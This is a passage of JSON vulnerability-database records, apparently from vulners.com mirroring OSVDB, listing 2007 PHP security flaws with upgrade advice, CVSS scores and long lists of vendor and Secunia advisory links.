http://www.us.debian.org/security/2007/dsa-1264\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200710-02.xml\nOther Advisory URL: http://fedoranews.org/cms/node/2720\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000154.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:048\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\nFrSIRT Advisory: 2007-0546\n[CVE-2007-0910](https://vulners.com/cve/CVE-2007-0910)\nBugtraq ID: 22496\n", "modified": "2007-02-09T07:18:50", "published": "2007-02-09T07:18:50", "href": "https://vulners.com/osvdb/OSVDB:32763", "id": "OSVDB:32763", "title": "PHP Super-global Variable Unspecified Clobber", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 4.4.5, 5.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_1.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-5.php#5.2.1\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:24241](https://secuniaresearch.flexerasoftware.com/advisories/24241/)\n[Secunia Advisory ID:24295](https://secuniaresearch.flexerasoftware.com/advisories/24295/)\n[Secunia Advisory ID:24421](https://secuniaresearch.flexerasoftware.com/advisories/24421/)\n[Secunia Advisory ID:24284](https://secuniaresearch.flexerasoftware.com/advisories/24284/)\n[Secunia Advisory ID:27102](https://secuniaresearch.flexerasoftware.com/advisories/27102/)\n[Secunia Advisory ID:24195](https://secuniaresearch.flexerasoftware.com/advisories/24195/)\n[Secunia Advisory ID:24282](https://secuniaresearch.flexerasoftware.com/advisories/24282/)\n[Secunia Advisory ID:24514](https://secuniaresearch.flexerasoftware.com/advisories/24514/)\n[Secunia Advisory ID:24217](https://secuniaresearch.flexerasoftware.com/advisories/24217/)\n[Secunia Advisory ID:24326](https://secuniaresearch.flexerasoftware.com/advisories/24326/)\n[Secunia Advisory ID:24432](https://secuniaresearch.flexerasoftware.com/advisories/24432/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:24248](https://secuniaresearch.flexerasoftware.com/advisories/24248/)\n[Secunia Advisory ID:24322](https://secuniaresearch.flexerasoftware.com/advisories/24322/)\n[Secunia Advisory ID:24236](https://secuniaresearch.flexerasoftware.com/advisories/24236/)\n[Secunia Advisory ID:24642](https://secuniaresearch.flexerasoftware.com/advisories/24642/)\n[Related OSVDB ID: 32763](https://vulners.com/osvdb/OSVDB:32763)\n[Related OSVDB ID: 34706](https://vulners.com/osvdb/OSVDB:34706)\n[Related OSVDB ID: 32762](https://vulners.com/osvdb/OSVDB:32762)\n[Related OSVDB ID: 32766](https://vulners.com/osvdb/OSVDB:32766)\n[Related OSVDB ID: 32768](https://vulners.com/osvdb/OSVDB:32768)\n[Related OSVDB ID: 32765](https://vulners.com/osvdb/OSVDB:32765)\n[Related OSVDB ID: 32767](https://vulners.com/osvdb/OSVDB:32767)\nRedHat RHSA: RHSA-2007:0076\nRedHat RHSA: RHSA-2007:0081\nRedHat RHSA: RHSA-2007:0089\nOther Advisory URL: http://fedoranews.org/cms/node/2681\nOther Advisory URL: https://lists.ubuntu.com/archives/ubuntu-security-announce/2007-February/000487.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070201-01-P.asc\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1264\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200710-02.xml\nOther Advisory URL: http://fedoranews.org/cms/node/2720\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000154.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:048\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\n[CVE-2007-0909](https://vulners.com/cve/CVE-2007-0909)\nBugtraq ID: 22496\n", "modified": "2007-02-09T07:18:50", "published": "2007-02-09T07:18:50", "href": "https://vulners.com/osvdb/OSVDB:32764", "id": "OSVDB:32764", "title": "PHP on 64-bit Multiple print Function Format String", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 5.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_1.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-5.php#5.2.1\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:24241](https://secuniaresearch.flexerasoftware.com/advisories/24241/)\n[Secunia Advisory ID:24284](https://secuniaresearch.flexerasoftware.com/advisories/24284/)\n[Secunia Advisory ID:24295](https://secuniaresearch.flexerasoftware.com/advisories/24295/)\n[Secunia Advisory ID:24421](https://secuniaresearch.flexerasoftware.com/advisories/24421/)\n[Secunia Advisory ID:24195](https://secuniaresearch.flexerasoftware.com/advisories/24195/)\n[Secunia Advisory ID:24282](https://secuniaresearch.flexerasoftware.com/advisories/24282/)\n[Secunia Advisory ID:24514](https://secuniaresearch.flexerasoftware.com/advisories/24514/)\n[Secunia Advisory ID:24217](https://secuniaresearch.flexerasoftware.com/advisories/24217/)\n[Secunia Advisory ID:24326](https://secuniaresearch.flexerasoftware.com/advisories/24326/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24432](https://secuniaresearch.flexerasoftware.com/advisories/24432/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:26048](https://secuniaresearch.flexerasoftware.com/advisories/26048/)\n[Secunia Advisory ID:24236](https://secuniaresearch.flexerasoftware.com/advisories/24236/)\n[Secunia Advisory ID:24248](https://secuniaresearch.flexerasoftware.com/advisories/24248/)\n[Secunia Advisory ID:24322](https://secuniaresearch.flexerasoftware.com/advisories/24322/)\n[Secunia Advisory ID:24642](https://secuniaresearch.flexerasoftware.com/advisories/24642/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\n[Related OSVDB ID: 32763](https://vulners.com/osvdb/OSVDB:32763)\n[Related OSVDB ID: 34706](https://vulners.com/osvdb/OSVDB:34706)\n[Related OSVDB ID: 34709](https://vulners.com/osvdb/OSVDB:34709)\n[Related OSVDB ID: 34712](https://vulners.com/osvdb/OSVDB:34712)\n[Related OSVDB ID: 34715](https://vulners.com/osvdb/OSVDB:34715)\n[Related OSVDB ID: 32762](https://vulners.com/osvdb/OSVDB:32762)\n[Related OSVDB ID: 32766](https://vulners.com/osvdb/OSVDB:32766)\n[Related OSVDB ID: 32768](https://vulners.com/osvdb/OSVDB:32768)\n[Related OSVDB ID: 32764](https://vulners.com/osvdb/OSVDB:32764)\n[Related OSVDB ID: 32767](https://vulners.com/osvdb/OSVDB:32767)\n[Related OSVDB ID: 34707](https://vulners.com/osvdb/OSVDB:34707)\n[Related OSVDB ID: 34711](https://vulners.com/osvdb/OSVDB:34711)\n[Related OSVDB ID: 34713](https://vulners.com/osvdb/OSVDB:34713)\n[Related OSVDB ID: 34708](https://vulners.com/osvdb/OSVDB:34708)\n[Related OSVDB ID: 34714](https://vulners.com/osvdb/OSVDB:34714)\nRedHat RHSA: RHSA-2007:0076\nRedHat RHSA: RHSA-2007:0081\nRedHat RHSA: RHSA-2007:0089\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070201-01-P.asc\nOther Advisory URL: http://fedoranews.org/cms/node/2681\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html\nOther Advisory URL: https://lists.ubuntu.com/archives/ubuntu-security-announce/2007-February/000487.html\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1264\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-07/msg00006.html\nOther Advisory URL: http://fedoranews.org/cms/node/2720\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000154.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:048\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\n[CVE-2007-0906](https://vulners.com/cve/CVE-2007-0906)\n", "modified": "2007-02-09T07:18:50", "published": "2007-02-09T07:18:50", "href": "https://vulners.com/osvdb/OSVDB:34710", "id": "OSVDB:34710", "title": "PHP stream Filters Unspecified Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 4.4.5, 5.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_1.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-5.php#5.2.1\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:24241](https://secuniaresearch.flexerasoftware.com/advisories/24241/)\n[Secunia Advisory ID:24284](https://secuniaresearch.flexerasoftware.com/advisories/24284/)\n[Secunia Advisory ID:24295](https://secuniaresearch.flexerasoftware.com/advisories/24295/)\n[Secunia Advisory ID:24421](https://secuniaresearch.flexerasoftware.com/advisories/24421/)\n[Secunia Advisory ID:24195](https://secuniaresearch.flexerasoftware.com/advisories/24195/)\n[Secunia Advisory ID:24282](https://secuniaresearch.flexerasoftware.com/advisories/24282/)\n[Secunia Advisory ID:24514](https://secuniaresearch.flexerasoftware.com/advisories/24514/)\n[Secunia Advisory ID:24217](https://secuniaresearch.flexerasoftware.com/advisories/24217/)\n[Secunia Advisory ID:24326](https://secuniaresearch.flexerasoftware.com/advisories/24326/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24432](https://secuniaresearch.flexerasoftware.com/advisories/24432/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:26048](https://secuniaresearch.flexerasoftware.com/advisories/26048/)\n[Secunia Advisory ID:24236](https://secuniaresearch.flexerasoftware.com/advisories/24236/)\n[Secunia Advisory ID:24248](https://secuniaresearch.flexerasoftware.com/advisories/24248/)\n[Secunia Advisory ID:24322](https://secuniaresearch.flexerasoftware.com/advisories/24322/)\n[Secunia Advisory ID:24642](https://secuniaresearch.flexerasoftware.com/advisories/24642/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\n[Related OSVDB ID: 32763](https://vulners.com/osvdb/OSVDB:32763)\n[Related OSVDB ID: 34706](https://vulners.com/osvdb/OSVDB:34706)\n[Related OSVDB ID: 34709](https://vulners.com/osvdb/OSVDB:34709)\n[Related OSVDB ID: 34712](https://vulners.com/osvdb/OSVDB:34712)\n[Related OSVDB ID: 32762](https://vulners.com/osvdb/OSVDB:32762)\n[Related OSVDB ID: 32766](https://vulners.com/osvdb/OSVDB:32766)\n[Related OSVDB ID: 32768](https://vulners.com/osvdb/OSVDB:32768)\n[Related OSVDB ID: 34710](https://vulners.com/osvdb/OSVDB:34710)\n[Related OSVDB ID: 32764](https://vulners.com/osvdb/OSVDB:32764)\n[Related OSVDB ID: 32767](https://vulners.com/osvdb/OSVDB:32767)\n[Related OSVDB ID: 34707](https://vulners.com/osvdb/OSVDB:34707)\n[Related OSVDB ID: 34711](https://vulners.com/osvdb/OSVDB:34711)\n[Related OSVDB ID: 34713](https://vulners.com/osvdb/OSVDB:34713)\n[Related OSVDB ID: 34708](https://vulners.com/osvdb/OSVDB:34708)\n[Related OSVDB ID: 34714](https://vulners.com/osvdb/OSVDB:34714)\nRedHat RHSA: RHSA-2007:0076\nRedHat RHSA: RHSA-2007:0081\nRedHat RHSA: RHSA-2007:0089\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070201-01-P.asc\nOther Advisory URL: http://fedoranews.org/cms/node/2681\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html\nOther Advisory URL: https://lists.ubuntu.com/archives/ubuntu-security-announce/2007-February/000487.html\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1264\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-07/msg00006.html\nOther Advisory URL: http://fedoranews.org/cms/node/2720\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000154.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:048\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\n[CVE-2007-0906](https://vulners.com/cve/CVE-2007-0906)\n", "modified": "2007-02-09T07:18:50", "published": "2007-02-09T07:18:50", "href": "https://vulners.com/osvdb/OSVDB:34715", "id": "OSVDB:34715", "title": "PHP ibase_modify_user() Function Unspecified Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 5.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_1.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-5.php#5.2.1\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:24241](https://secuniaresearch.flexerasoftware.com/advisories/24241/)\n[Secunia Advisory ID:24284](https://secuniaresearch.flexerasoftware.com/advisories/24284/)\n[Secunia Advisory ID:24295](https://secuniaresearch.flexerasoftware.com/advisories/24295/)\n[Secunia Advisory ID:24421](https://secuniaresearch.flexerasoftware.com/advisories/24421/)\n[Secunia Advisory ID:24195](https://secuniaresearch.flexerasoftware.com/advisories/24195/)\n[Secunia Advisory ID:24282](https://secuniaresearch.flexerasoftware.com/advisories/24282/)\n[Secunia Advisory ID:24514](https://secuniaresearch.flexerasoftware.com/advisories/24514/)\n[Secunia Advisory ID:24217](https://secuniaresearch.flexerasoftware.com/advisories/24217/)\n[Secunia Advisory ID:24326](https://secuniaresearch.flexerasoftware.com/advisories/24326/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24432](https://secuniaresearch.flexerasoftware.com/advisories/24432/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:26048](https://secuniaresearch.flexerasoftware.com/advisories/26048/)\n[Secunia Advisory ID:24236](https://secuniaresearch.flexerasoftware.com/advisories/24236/)\n[Secunia Advisory ID:24248](https://secuniaresearch.flexerasoftware.com/advisories/24248/)\n[Secunia Advisory ID:24322](https://secuniaresearch.flexerasoftware.com/advisories/24322/)\n[Secunia Advisory ID:24642](https://secuniaresearch.flexerasoftware.com/advisories/24642/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\n[Related OSVDB ID: 32763](https://vulners.com/osvdb/OSVDB:32763)\n[Related OSVDB ID: 34706](https://vulners.com/osvdb/OSVDB:34706)\n[Related OSVDB ID: 34712](https://vulners.com/osvdb/OSVDB:34712)\n[Related OSVDB ID: 34715](https://vulners.com/osvdb/OSVDB:34715)\n[Related OSVDB ID: 32762](https://vulners.com/osvdb/OSVDB:32762)\n[Related OSVDB ID: 32766](https://vulners.com/osvdb/OSVDB:32766)\n[Related OSVDB ID: 32768](https://vulners.com/osvdb/OSVDB:32768)\n[Related OSVDB ID: 34710](https://vulners.com/osvdb/OSVDB:34710)\n[Related OSVDB ID: 32764](https://vulners.com/osvdb/OSVDB:32764)\n[Related OSVDB ID: 32767](https://vulners.com/osvdb/OSVDB:32767)\n[Related OSVDB ID: 34707](https://vulners.com/osvdb/OSVDB:34707)\n[Related OSVDB ID: 34711](https://vulners.com/osvdb/OSVDB:34711)\n[Related OSVDB ID: 34713](https://vulners.com/osvdb/OSVDB:34713)\n[Related OSVDB ID: 34708](https://vulners.com/osvdb/OSVDB:34708)\n[Related OSVDB ID: 34714](https://vulners.com/osvdb/OSVDB:34714)\nRedHat RHSA: RHSA-2007:0076\nRedHat RHSA: RHSA-2007:0081\nRedHat RHSA: RHSA-2007:0089\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070201-01-P.asc\nOther Advisory URL: http://fedoranews.org/cms/node/2681\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html\nOther Advisory URL: https://lists.ubuntu.com/archives/ubuntu-security-announce/2007-February/000487.html\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1264\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-07/msg00006.html\nOther Advisory URL: http://fedoranews.org/cms/node/2720\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000154.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:048\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\n[CVE-2007-0906](https://vulners.com/cve/CVE-2007-0906)\n", "modified": "2007-02-09T07:18:50", "published": "2007-02-09T07:18:50", "href": "https://vulners.com/osvdb/OSVDB:34709", "id": "OSVDB:34709", "title": "PHP sqlite Extension Unspecified Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 4.4.5, 5.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/releases/5_2_1.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-5.php#5.2.1\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:24241](https://secuniaresearch.flexerasoftware.com/advisories/24241/)\n[Secunia Advisory ID:24284](https://secuniaresearch.flexerasoftware.com/advisories/24284/)\n[Secunia Advisory ID:24295](https://secuniaresearch.flexerasoftware.com/advisories/24295/)\n[Secunia Advisory ID:24421](https://secuniaresearch.flexerasoftware.com/advisories/24421/)\n[Secunia Advisory ID:24195](https://secuniaresearch.flexerasoftware.com/advisories/24195/)\n[Secunia Advisory ID:24282](https://secuniaresearch.flexerasoftware.com/advisories/24282/)\n[Secunia Advisory ID:24514](https://secuniaresearch.flexerasoftware.com/advisories/24514/)\n[Secunia Advisory ID:24217](https://secuniaresearch.flexerasoftware.com/advisories/24217/)\n[Secunia Advisory ID:24326](https://secuniaresearch.flexerasoftware.com/advisories/24326/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24432](https://secuniaresearch.flexerasoftware.com/advisories/24432/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:26048](https://secuniaresearch.flexerasoftware.com/advisories/26048/)\n[Secunia Advisory ID:24236](https://secuniaresearch.flexerasoftware.com/advisories/24236/)\n[Secunia Advisory ID:24248](https://secuniaresearch.flexerasoftware.com/advisories/24248/)\n[Secunia Advisory ID:24322](https://secuniaresearch.flexerasoftware.com/advisories/24322/)\n[Secunia Advisory ID:24642](https://secuniaresearch.flexerasoftware.com/advisories/24642/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\n[Related OSVDB ID: 32763](https://vulners.com/osvdb/OSVDB:32763)\n[Related OSVDB ID: 34706](https://vulners.com/osvdb/OSVDB:34706)\n[Related OSVDB ID: 34709](https://vulners.com/osvdb/OSVDB:34709)\n[Related OSVDB ID: 34712](https://vulners.com/osvdb/OSVDB:34712)\n[Related OSVDB ID: 34715](https://vulners.com/osvdb/OSVDB:34715)\n[Related OSVDB ID: 32762](https://vulners.com/osvdb/OSVDB:32762)\n[Related OSVDB ID: 32766](https://vulners.com/osvdb/OSVDB:32766)\n[Related OSVDB ID: 32768](https://vulners.com/osvdb/OSVDB:32768)\n[Related OSVDB ID: 34710](https://vulners.com/osvdb/OSVDB:34710)\n[Related OSVDB ID: 32764](https://vulners.com/osvdb/OSVDB:32764)\n[Related OSVDB ID: 32767](https://vulners.com/osvdb/OSVDB:32767)\n[Related OSVDB ID: 34711](https://vulners.com/osvdb/OSVDB:34711)\n[Related OSVDB ID: 34713](https://vulners.com/osvdb/OSVDB:34713)\n[Related OSVDB ID: 34708](https://vulners.com/osvdb/OSVDB:34708)\n[Related OSVDB ID: 34714](https://vulners.com/osvdb/OSVDB:34714)\nRedHat RHSA: RHSA-2007:0076\nRedHat RHSA: RHSA-2007:0081\nRedHat RHSA: RHSA-2007:0089\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070201-01-P.asc\nOther Advisory URL: http://fedoranews.org/cms/node/2681\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html\nOther Advisory URL: https://lists.ubuntu.com/archives/ubuntu-security-announce/2007-February/000487.html\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1264\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-07/msg00006.html\nOther Advisory URL: http://fedoranews.org/cms/node/2720\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000154.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:048\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\n[CVE-2007-0906](https://vulners.com/cve/CVE-2007-0906)\n", "modified": "2007-02-09T07:18:50", "published": "2007-02-09T07:18:50", "href": "https://vulners.com/osvdb/OSVDB:34707", "id": "OSVDB:34707", "title": "PHP zip Extension Unspecified Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}